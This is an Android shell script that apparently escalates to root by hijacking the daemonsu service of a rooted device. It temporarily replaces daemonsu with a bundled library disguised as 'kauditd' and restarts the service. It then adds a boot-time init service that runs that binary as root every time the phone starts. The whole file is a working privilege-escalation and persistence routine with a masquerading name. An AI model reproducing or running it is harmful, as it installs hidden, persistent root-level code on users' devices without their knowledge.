#!/system/bin/sh
if [ "$(whoami)" != root ]; then
  rootfs=/data/local/tmp/rootfs

  ln -s / "$rootfs"

  cp -f "${0%/*}"/libkauditd.so "$rootfs"/sbin/kauditd

  chmod 755 "$rootfs"/sbin/kauditd

  if [ ! -d "$rootfs"/system/xbin/ ]; then
    mkdir -m 755 "$rootfs"/system/xbin/

    remove=true
  elif [ -f "$rootfs"/system/xbin/daemonsu ]; then
    mv "$rootfs"/system/xbin/daemonsu "$rootfs"/system/xbin/daemonsu.old
  fi

  ln -sf "$rootfs"/sbin/kauditd "$rootfs"/system/xbin/daemonsu

  setprop ctl.restart daemonsu

  if [ "$remove" ]; then
    rm -rf "$rootfs"/system/xbin/
  else
    rm "$rootfs"/system/xbin/daemonsu

    if [ -f "$rootfs"/system/xbin/daemonsu.old ]; then
      mv "$rootfs"/system/xbin/daemonsu.old "$rootfs"/system/xbin/daemonsu
    fi
  fi

  cat << 'EOF' > "$rootfs"/system/etc/init/kauditd.rc
service kauditd /sbin/kauditd --daemon
    class core
    user root
    group root
EOF

  chmod 644 "$rootfs"/system/etc/init/kauditd.rc

  rm -f "$rootfs"

  exit
fi

export PATH=/sbin/.magisk/busybox:"$PATH"

"$@"